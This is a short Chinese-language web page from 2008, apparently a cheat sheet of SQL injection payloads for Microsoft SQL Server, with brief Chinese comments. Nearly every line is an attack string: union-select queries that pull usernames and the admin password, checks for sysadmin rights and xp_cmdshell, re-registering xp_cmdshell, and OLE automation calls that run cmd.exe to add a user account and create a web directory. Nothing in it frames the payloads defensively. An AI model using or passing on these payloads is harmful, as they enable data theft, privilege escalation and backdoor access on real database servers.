2008-10-27 16:51:32 来源:WEB开发网构造语句:查询是否存在xp_cmdshell
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootmkwebdir.vbs -w "默认 Web 站点" -v "e","e:"'
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